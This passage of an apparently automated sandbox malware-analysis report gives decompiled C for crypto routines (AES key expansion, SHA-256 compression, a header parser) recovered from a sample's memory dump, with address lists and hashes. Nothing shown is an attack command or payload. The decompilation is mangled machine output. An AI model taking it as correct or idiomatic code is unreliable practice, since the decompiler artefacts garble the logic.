					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































                                                    0x00ce4f9f
                                                    0x00ce4fa2
                                                    0x00ce4fa6
                                                    0x00ce4fa9
                                                    0x00ce4fad
                                                    0x00ce4fb0
                                                    0x00ce501e
                                                    0x00ce5021
                                                    0x00ce5070
                                                    0x00ce5070
                                                    0x00ce5073
                                                    0x00ce4fe0
                                                    0x00ce4fe2
                                                    0x00ce4fe7
                                                    0x00ce4fe9
                                                    0x00ce508e
                                                    0x00ce5092
                                                    0x00ce509b
                                                    0x00ce50a0
                                                    0x00ce50a1
                                                    0x00ce50a5
                                                    0x00ce50a7
                                                    0x00ce50ac
                                                    0x00ce50af
                                                    0x00ce50b1
                                                    0x00ce50da
                                                    0x00ce50da
                                                    0x00ce50dd
                                                    0x00ce50e0
                                                    0x00ce50e7
                                                    0x00ce50e9
                                                    0x00ce50ec
                                                    0x00ce50ee
                                                    0x00ce50f2
                                                    0x00ce50f2
                                                    0x00ce50f5
                                                    0x00ce5100
                                                    0x00ce5100
                                                    0x00ce5102
                                                    0x00ce5102
                                                    0x00ce5104
                                                    0x00ce510a
                                                    0x00ce510a
                                                    0x00ce510f
                                                    0x00ce5112
                                                    0x00ce511d
                                                    0x00ce511d
                                                    0x00ce511f
                                                    0x00ce511f
                                                    0x00ce512a
                                                    0x00ce512e
                                                    0x00ce512e
                                                    0x00ce5131
                                                    0x00ce5137
                                                    0x00ce5139
                                                    0x00ce513c
                                                    0x00ce514c
                                                    0x00ce5151
                                                    0x00ce5151
                                                    0x00ce5166
                                                    0x00ce516b
                                                    0x00ce516e
                                                    0x00ce5173
                                                    0x00ce5176
                                                    0x00ce5178
                                                    0x00ce517a
                                                    0x00ce517d
                                                    0x00ce5180
                                                    0x00ce518d
                                                    0x00ce5192
                                                    0x00ce5192
                                                    0x00ce5180
                                                    0x00ce5199
                                                    0x00ce519e
                                                    0x00ce51a1
                                                    0x00ce51a6
                                                    0x00ce51a9
                                                    0x00ce51ab
                                                    0x00ce51b8
                                                    0x00ce51bd
                                                    0x00ce51ab
                                                    0x00ce51c0
                                                    0x00ce51c3
                                                    0x00ce51c8
                                                    0x00ce51c8
                                                    0x00ce5114
                                                    0x00ce5117
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5119
                                                    0x00000000
                                                    0x00ce5119
                                                    0x00ce5106
                                                    0x00ce5108
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5108
                                                    0x00ce50f7
                                                    0x00ce50fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce50fc
                                                    0x00000000
                                                    0x00ce50fc
                                                    0x00ce50f0
                                                    0x00ce50f0
                                                    0x00ce50f0
                                                    0x00000000
                                                    0x00ce50f0
                                                    0x00ce50e2
                                                    0x00ce50e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce50e5
                                                    0x00ce50b5
                                                    0x00ce50b8
                                                    0x00ce50ba
                                                    0x00ce50c2
                                                    0x00ce50c4
                                                    0x00ce50ce
                                                    0x00ce50d0
                                                    0x00ce50d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce50d4
                                                    0x00ce50d8
                                                    0x00ce50d8
                                                    0x00000000
                                                    0x00ce50d8
                                                    0x00ce50c6
                                                    0x00000000
                                                    0x00ce50c6
                                                    0x00ce50bc
                                                    0x00000000
                                                    0x00ce50bc
                                                    0x00ce5094
                                                    0x00000000
                                                    0x00ce5094
                                                    0x00ce4fef
                                                    0x00ce4fef
                                                    0x00000000
                                                    0x00ce4fef
                                                    0x00ce507a
                                                    0x00ce507a
                                                    0x00ce507d
                                                    0x00ce504f
                                                    0x00ce504f
                                                    0x00ce5050
                                                    0x00ce5052
                                                    0x00ce5054
                                                    0x00000000
                                                    0x00ce5054
                                                    0x00ce507f
                                                    0x00ce5082
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5088
                                                    0x00ce4ff7
                                                    0x00ce4ff7
                                                    0x00000000
                                                    0x00ce4ff7
                                                    0x00ce5023
                                                    0x00ce5066
                                                    0x00000000
                                                    0x00ce5066
                                                    0x00ce5025
                                                    0x00ce5028
                                                    0x00ce505b
                                                    0x00ce505d
                                                    0x00000000
                                                    0x00ce505d
                                                    0x00ce502a
                                                    0x00ce502d
                                                    0x00ce504b
                                                    0x00ce504b
                                                    0x00ce504b
                                                    0x00ce504b
                                                    0x00000000
                                                    0x00ce504b
                                                    0x00ce502f
                                                    0x00ce5032
                                                    0x00ce5044
                                                    0x00000000
                                                    0x00ce5044
                                                    0x00ce5034
                                                    0x00ce5037
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce503b
                                                    0x00000000
                                                    0x00ce503b
                                                    0x00ce4fb2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce4fb8
                                                    0x00ce4fbb
                                                    0x00ce4ffb
                                                    0x00ce4ffb
                                                    0x00ce4ffe
                                                    0x00ce5017
                                                    0x00000000
                                                    0x00ce5017
                                                    0x00ce5000
                                                    0x00ce5000
                                                    0x00ce5003
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5006
                                                    0x00ce5009
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce500b
                                                    0x00ce500e
                                                    0x00000000
                                                    0x00ce500e
                                                    0x00ce4fbd
                                                    0x00ce4ff6
                                                    0x00000000
                                                    0x00ce4ff6
                                                    0x00ce4fc2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce4fcb
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce4fd0
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce4fd5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce4fde
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                    • Instruction ID: 720fbb2404c505c779ef9bcbd4913ef5a22e2bcc6c05a53a434c4f4322c7446c
                                                    • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                    • Instruction Fuzzy Hash: DE514771600FC857DF3889AB8556FBF63C59B0270CF180919F8A3DB282C615EF4593A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCEFE2 Relevance: .2, Instructions: 161COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 97%
                                                    			E00CCEFE2(intOrPtr __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _t94;
				signed int _t113;
				signed int _t116;
				signed int _t117;
				signed char _t120;
				signed int* _t121;
				signed int* _t122;
				signed int _t123;
				signed int* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int* _t128;
				void* _t130;
				signed int _t131;
				void* _t132;
				signed int _t134;
				signed int* _t139;
				signed int* _t142;
				void* _t145;
				void* _t167;

				_t134 = _a4 - 6;
				_v48 = __ecx;
				_v40 = _t134;
				_t94 = E00CE0320( &_v32, _a4, 0x20);
				_t145 =  &_v48 + 0xc;
				_t117 = 0;
				_t126 = 0;
				_t127 = 0;
				if(_t134 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t128 = 0xcfe198;
						do {
							_t120 = _v32 ^  *(( *(_t145 + 0x1d + _t134 * 4) & 0x000000ff) + 0xcfe098);
							_v32 = _t120;
							_v31 = _v31 ^  *(( *(_t145 + 0x1e + _t134 * 4) & 0x000000ff) + 0xcfe098);
							_v30 = _v30 ^  *(( *(_t145 + 0x1f + _t134 * 4) & 0x000000ff) + 0xcfe098);
							_v29 = _v29 ^  *(( *(_t145 + 0x1c + _t134 * 4) & 0x000000ff) + 0xcfe098);
							_t94 =  *_t128 ^ _t120;
							_v32 = _t94;
							_v36 =  &(_t128[0]);
							if(_t134 == 8) {
								_t121 =  &_v28;
								_v44 = 3;
								do {
									_t130 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t55 =  &_v44;
									 *_t55 = _v44 - 1;
								} while ( *_t55 != 0);
								_t122 =  &_v12;
								_v44 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xcfe098);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xcfe098);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xcfe098);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xcfe098);
								do {
									_t131 = 4;
									do {
										_t94 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t94;
										_t122 =  &(_t122[0]);
										_t131 = _t131 - 1;
									} while (_t131 != 0);
									_t76 =  &_v44;
									 *_t76 = _v44 - 1;
								} while ( *_t76 != 0);
								goto L28;
							} else {
								if(_t134 > 1) {
									_t124 =  &_v28;
									_v44 = _t134 - 1;
									do {
										_t132 = 4;
										do {
											_t94 =  *((intOrPtr*)(_t124 - 4));
											 *_t124 =  *_t124 ^ _t94;
											_t124 =  &(_t124[0]);
											_t132 = _t132 - 1;
										} while (_t132 != 0);
										_t50 =  &_v44;
										 *_t50 = _v44 - 1;
									} while ( *_t50 != 0);
								}
								_t131 = 0;
								if(_t134 <= 0) {
									L37:
									_t167 = _t117 - _a4;
								} else {
									L28:
									while(_t117 <= _a4) {
										if(_t131 < _t134) {
											_t139 =  &(( &_v32)[_t131]);
											while(_t126 < 4) {
												_t123 = _t126 + _t117 * 4;
												_t113 =  *_t139;
												_t131 = _t131 + 1;
												_t139 =  &_a4;
												_t126 = _t126 + 1;
												 *(_v48 + 0x18 + _t123 * 4) = _t113;
												_t134 = _v40;
												if(_t131 < _t134) {
													continue;
												}
												break;
											}
										}
										if(_t126 == 4) {
											_t117 = _t117 + 1;
										}
										_t90 = _t126 - 4; // -4
										_t94 =  ~_t90;
										asm("sbb eax, eax");
										_t126 = _t126 & _t94;
										if(_t131 < _t134) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
								}
							}
							L38:
							_t128 = _v36;
						} while (_t167 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t127 < _t134) {
							_t142 =  &(( &_v32)[_t127]);
							while(_t126 < 4) {
								_t125 = _t126 + _t117 * 4;
								_t116 =  *_t142;
								_t127 = _t127 + 1;
								_t142 =  &_a4;
								_t126 = _t126 + 1;
								 *(_v48 + 0x18 + _t125 * 4) = _t116;
								_t134 = _v40;
								if(_t127 < _t134) {
									continue;
								}
								break;
							}
						}
						if(_t126 == 4) {
							_t117 = _t117 + 1;
						}
						_t18 = _t126 - 4; // -4
						_t94 =  ~_t18;
						asm("sbb eax, eax");
						_t126 = _t126 & _t94;
						if(_t127 < _t134) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t94;
			}










































                                                    0x00cceff8
                                                    0x00cceffb
                                                    0x00ccf000
                                                    0x00ccf004
                                                    0x00ccf009
                                                    0x00ccf00c
                                                    0x00ccf00e
                                                    0x00ccf010
                                                    0x00ccf014
                                                    0x00ccf062
                                                    0x00ccf065
                                                    0x00ccf06b
                                                    0x00ccf070
                                                    0x00ccf079
                                                    0x00ccf07f
                                                    0x00ccf08e
                                                    0x00ccf09d
                                                    0x00ccf0ac
                                                    0x00ccf0b2
                                                    0x00ccf0b5
                                                    0x00ccf0b9
                                                    0x00ccf0c0
                                                    0x00ccf0f3
                                                    0x00ccf0f7
                                                    0x00ccf0ff
                                                    0x00ccf101
                                                    0x00ccf102
                                                    0x00ccf105
                                                    0x00ccf107
                                                    0x00ccf108
                                                    0x00ccf108
                                                    0x00ccf10d
                                                    0x00ccf10d
                                                    0x00ccf10d
                                                    0x00ccf119
                                                    0x00ccf11d
                                                    0x00ccf12b
                                                    0x00ccf13a
                                                    0x00ccf149
                                                    0x00ccf158
                                                    0x00ccf15c
                                                    0x00ccf15e
                                                    0x00ccf15f
                                                    0x00ccf15f
                                                    0x00ccf162
                                                    0x00ccf164
                                                    0x00ccf165
                                                    0x00ccf165
                                                    0x00ccf16a
                                                    0x00ccf16a
                                                    0x00ccf16a
                                                    0x00000000
                                                    0x00ccf0c2
                                                    0x00ccf0c5
                                                    0x00ccf0ca
                                                    0x00ccf0ce
                                                    0x00ccf0d2
                                                    0x00ccf0d4
                                                    0x00ccf0d5
                                                    0x00ccf0d5
                                                    0x00ccf0d8
                                                    0x00ccf0da
                                                    0x00ccf0db
                                                    0x00ccf0db
                                                    0x00ccf0e0
                                                    0x00ccf0e0
                                                    0x00ccf0e0
                                                    0x00ccf0d2
                                                    0x00ccf0e7
                                                    0x00ccf0eb
                                                    0x00ccf1b9
                                                    0x00ccf1b9
                                                    0x00ccf0f1
                                                    0x00000000
                                                    0x00ccf171
                                                    0x00ccf178
                                                    0x00ccf17e
                                                    0x00ccf182
                                                    0x00ccf18b
                                                    0x00ccf18e
                                                    0x00ccf191
                                                    0x00ccf192
                                                    0x00ccf195
                                                    0x00ccf196
                                                    0x00ccf19a
                                                    0x00ccf1a0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccf1a0
                                                    0x00ccf1a2
                                                    0x00ccf1a9
                                                    0x00ccf1ab
                                                    0x00ccf1ab
                                                    0x00ccf1ac
                                                    0x00ccf1af
                                                    0x00ccf1b1
                                                    0x00ccf1b3
                                                    0x00ccf1b7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccf1b7
                                                    0x00ccf171
                                                    0x00ccf0eb
                                                    0x00ccf1bc
                                                    0x00ccf1bc
                                                    0x00ccf1bc
                                                    0x00ccf070
                                                    0x00000000
                                                    0x00ccf016
                                                    0x00ccf021
                                                    0x00ccf027
                                                    0x00ccf02b
                                                    0x00ccf034
                                                    0x00ccf037
                                                    0x00ccf03a
                                                    0x00ccf03b
                                                    0x00ccf03e
                                                    0x00ccf03f
                                                    0x00ccf043
                                                    0x00ccf049
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccf049
                                                    0x00ccf04b
                                                    0x00ccf052
                                                    0x00ccf054
                                                    0x00ccf054
                                                    0x00ccf055
                                                    0x00ccf058
                                                    0x00ccf05a
                                                    0x00ccf05c
                                                    0x00ccf060
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccf060
                                                    0x00ccf016
                                                    0x00ccf1cd
                                                    0x00ccf1cd

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bf59200e99960125268c950917f9087bc38e3497dded4f12d8c47410a6ea48c
                                                    • Instruction ID: cbd4fcb8d72f10f3037188f29dcffc4ef13c216df833b8a843ac56a5aa4b8320
                                                    • Opcode Fuzzy Hash: 9bf59200e99960125268c950917f9087bc38e3497dded4f12d8c47410a6ea48c
                                                    • Instruction Fuzzy Hash: B651D3715083D58FD712CF24C18096EBFE2AE9A714F4909ADE4E95B243C231DB4BDB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD00B7 Relevance: .1, Instructions: 141COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00CD00B7() {
				signed int _t81;
				signed int _t96;
				signed int _t98;
				signed int* _t99;
				unsigned int* _t100;
				void* _t101;
				unsigned int _t103;
				signed int _t108;
				unsigned int _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t130;
				signed int _t131;
				signed int* _t132;
				signed int _t133;
				signed int _t140;
				void* _t146;
				void* _t147;
				void* _t148;
				signed int _t149;
				void* _t151;

				_t130 =  *(_t151 + 0x148);
				_t133 = 0;
				_t99 =  &(_t130[0xa]);
				do {
					 *((intOrPtr*)(_t151 + 0x48 + _t133 * 4)) = E00CE68E4( *_t99);
					_t99 =  &(_t99[1]);
					_t133 = _t133 + 1;
				} while (_t133 < 0x10);
				_t100 = _t151 + 0x80;
				_t148 = 0x30;
				do {
					_t103 =  *(_t100 - 0x34);
					_t122 =  *_t100;
					asm("rol esi, 0xe");
					_t100 =  &(_t100[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t100[1] = (_t103 ^ _t103 ^ _t103 >> 0x00000003) + (_t122 ^ _t122 ^ _t122 >> 0x0000000a) +  *((intOrPtr*)(_t100 - 0x3c)) +  *((intOrPtr*)(_t100 - 0x18));
					_t148 = _t148 - 1;
				} while (_t148 != 0);
				_t81 =  *_t130;
				_t101 = 0;
				_t108 = _t130[1];
				_t124 = _t130[2];
				_t140 = _t130[5];
				_t149 = _t130[4];
				 *(_t151 + 0x20) = _t81;
				 *(_t151 + 0x2c) = _t81;
				 *(_t151 + 0x28) = _t130[3];
				 *(_t151 + 0x10) = _t130[6];
				_t131 =  *(_t151 + 0x20);
				 *(_t151 + 0x14) = _t108;
				 *(_t151 + 0x18) = _t124;
				 *(_t151 + 0x1c) = _t140;
				 *(_t151 + 0x24) = _t130[7];
				do {
					 *(_t151 + 0x40) =  *(_t151 + 0x10);
					asm("rol eax, 0x7");
					 *(_t151 + 0x3c) = _t140;
					asm("ror esi, 0xb");
					 *(_t151 + 0x30) = _t108;
					 *(_t151 + 0x34) = _t124;
					_t125 =  *(_t151 + 0x1c);
					asm("ror eax, 0x6");
					 *(_t151 + 0x1c) = _t149;
					 *(_t151 + 0x38) = _t149;
					_t40 = _t101 + 0xcf3b28; // 0x428a2f98
					_t146 = (_t149 ^ _t149 ^ _t149) + ( !_t149 &  *(_t151 + 0x10) ^ _t125 & _t149) +  *_t40 +  *((intOrPtr*)(_t151 + _t101 + 0x44));
					_t101 = _t101 + 4;
					_t147 = _t146 +  *(_t151 + 0x24);
					 *(_t151 + 0x24) =  *(_t151 + 0x10);
					_t149 =  *(_t151 + 0x28) + _t147;
					 *(_t151 + 0x10) = _t125;
					asm("rol eax, 0xa");
					asm("ror edx, 0xd");
					 *(_t151 + 0x20) = _t131;
					asm("ror eax, 0x2");
					 *(_t151 + 0x28) =  *(_t151 + 0x18);
					_t96 =  *(_t151 + 0x14);
					_t108 = _t131;
					 *(_t151 + 0x18) = _t96;
					 *(_t151 + 0x14) = _t108;
					_t131 = (_t131 ^ _t131 ^ _t131) + (( *(_t151 + 0x18) ^  *(_t151 + 0x14)) & _t131 ^  *(_t151 + 0x18) &  *(_t151 + 0x14)) + _t147;
					_t140 =  *(_t151 + 0x1c);
					_t124 = _t96;
				} while (_t101 < 0x100);
				_t98 =  *(_t151 + 0x2c) + _t131;
				_t132 =  *(_t151 + 0x148);
				_t132[1] = _t132[1] + _t108;
				_t132[2] = _t132[2] +  *(_t151 + 0x30);
				_t132[3] = _t132[3] +  *(_t151 + 0x34);
				_t132[5] = _t132[5] +  *(_t151 + 0x38);
				_t132[6] = _t132[6] +  *(_t151 + 0x3c);
				_t132[4] = _t132[4] + _t149;
				_t132[7] = _t132[7] +  *(_t151 + 0x40);
				 *_t132 = _t98;
				return _t98;
			}
























                                                    0x00cd00c1
                                                    0x00cd00c8
                                                    0x00cd00ca
                                                    0x00cd00cd
                                                    0x00cd00d4
                                                    0x00cd00d8
                                                    0x00cd00db
                                                    0x00cd00dd
                                                    0x00cd00e4
                                                    0x00cd00eb
                                                    0x00cd00ec
                                                    0x00cd00ec
                                                    0x00cd00f1
                                                    0x00cd00f5
                                                    0x00cd00f8
                                                    0x00cd00fb
                                                    0x00cd0109
                                                    0x00cd010c
                                                    0x00cd011e
                                                    0x00cd0121
                                                    0x00cd0121
                                                    0x00cd0126
                                                    0x00cd0128
                                                    0x00cd012a
                                                    0x00cd012d
                                                    0x00cd0130
                                                    0x00cd0133
                                                    0x00cd0136
                                                    0x00cd013a
                                                    0x00cd0141
                                                    0x00cd0148
                                                    0x00cd014f
                                                    0x00cd0153
                                                    0x00cd0157
                                                    0x00cd015b
                                                    0x00cd015f
                                                    0x00cd0163
                                                    0x00cd0167
                                                    0x00cd016d
                                                    0x00cd0170
                                                    0x00cd0176
                                                    0x00cd017b
                                                    0x00cd017f
                                                    0x00cd0185
                                                    0x00cd018b
                                                    0x00cd0198
                                                    0x00cd019e
                                                    0x00cd01ae
                                                    0x00cd01b4
                                                    0x00cd01b8
                                                    0x00cd01bb
                                                    0x00cd01bf
                                                    0x00cd01c3
                                                    0x00cd01c5
                                                    0x00cd01cb
                                                    0x00cd01d0
                                                    0x00cd01d5
                                                    0x00cd01db
                                                    0x00cd01f8
                                                    0x00cd01fc
                                                    0x00cd0200
                                                    0x00cd0202
                                                    0x00cd0206
                                                    0x00cd020a
                                                    0x00cd020d
                                                    0x00cd0211
                                                    0x00cd0213
                                                    0x00cd0223
                                                    0x00cd0225
                                                    0x00cd022c
                                                    0x00cd0233
                                                    0x00cd023a
                                                    0x00cd0241
                                                    0x00cd0248
                                                    0x00cd024b
                                                    0x00cd0252
                                                    0x00cd0255
                                                    0x00cd0261

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                    • Instruction ID: 94482213c493999be2c0142c345e7507de57e993577bd0e967719f7bd64c6981
                                                    • Opcode Fuzzy Hash: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                    • Instruction Fuzzy Hash: DF51E2B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD3E0B Relevance: .1, Instructions: 112COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CD3E0B(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00CD4E52(__ecx) != 0) {
					E00CCA881(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E00CCA898(_t88) >> 8;
					E00CCA881(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L12;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E00CCA898(_t88) >> 8;
					E00CCA881(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L8:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L12;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E00CCA898(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L8;
				} else {
					L12:
					return 0;
				}
			}


















                                                    0x00cd3e11
                                                    0x00cd3e15
                                                    0x00cd3e18
                                                    0x00cd3e1c
                                                    0x00cd3e1e
                                                    0x00cd3e22
                                                    0x00cd3e28
                                                    0x00cd3e4f
                                                    0x00cd3e62
                                                    0x00cd3e66
                                                    0x00cd3e6f
                                                    0x00cd3e7a
                                                    0x00cd3e7b
                                                    0x00cd3e82
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd3e8f
                                                    0x00cd3e92
                                                    0x00cd3ea3
                                                    0x00cd3ea7
                                                    0x00cd3eb0
                                                    0x00cd3eeb
                                                    0x00cd3eeb
                                                    0x00cd3efb
                                                    0x00cd3f08
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd3f0a
                                                    0x00cd3f0c
                                                    0x00cd3f0f
                                                    0x00cd3f12
                                                    0x00cd3f18
                                                    0x00cd3f1c
                                                    0x00cd3f1e
                                                    0x00cd3f1e
                                                    0x00cd3f20
                                                    0x00cd3f30
                                                    0x00cd3f35
                                                    0x00000000
                                                    0x00cd3f35
                                                    0x00cd3eb2
                                                    0x00cd3eb6
                                                    0x00cd3eb8
                                                    0x00cd3ec4
                                                    0x00cd3ec6
                                                    0x00cd3ecc
                                                    0x00cd3ece
                                                    0x00cd3ed9
                                                    0x00cd3edb
                                                    0x00cd3ede
                                                    0x00cd3ede
                                                    0x00cd3ee3
                                                    0x00cd3ee7
                                                    0x00000000
                                                    0x00cd3f3a
                                                    0x00cd3f3a
                                                    0x00000000
                                                    0x00cd3f3a

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
